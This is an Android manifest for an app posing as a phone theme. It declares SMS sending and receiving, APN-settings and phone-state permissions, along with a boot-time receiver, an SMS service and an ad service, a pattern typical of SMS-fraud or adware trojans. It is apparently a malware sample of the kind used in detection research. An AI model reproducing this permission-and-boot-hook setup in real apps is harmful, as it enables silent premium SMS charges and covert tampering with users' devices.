<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.jx.theme.n1800628253">
    <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.WRITE_APN_SETTINGS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.SET_WALLPAPER"/>
    <uses-permission android:name="android.permission.RECEIVE_MMS"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <application android:allowClearUserData="true" android:icon="@drawable/icon" android:label="@string/app_name">
        <activity android:label="@string/app_name" android:name="com.jx.MainActivity" android:screenOrientation="portrait">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:label="@string/app_name" android:name="com.jx.SettingActivity" android:screenOrientation="portrait"/>
        <activity android:label="@string/app_name" android:name="com.jx.WelcomeActivity" android:theme="@android:style/Theme.Dialog"/>
        <service android:name="com.jx.ad.AndroidThemeService">
            <intent-filter>
                <action android:name="com.jx.ad.ADService.Init"/>
            </intent-filter>
            <intent-filter>
                <action android:name="com.jx.ad.ADService.Run"/>
                <action android:name="com.jx.ad.ADService.RunCancel"/>
            </intent-filter>
        </service>
        <service android:name="com.jx.ad.BootSmsReceiverService">
            <intent-filter>
                <action android:name="com.jx.ad.BootSmsReceiverService.Start"/>
            </intent-filter>
        </service>
        <receiver android:name="com.jx.ad.BootReceiver">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
            </intent-filter>
        </receiver>
        <meta-data android:name="Wooboo_PID" android:value="61d28827991d463abc366a00ec755d8b"/>
        <meta-data android:name="Market_ID" android:value="1"/>
    </application>
</manifest>
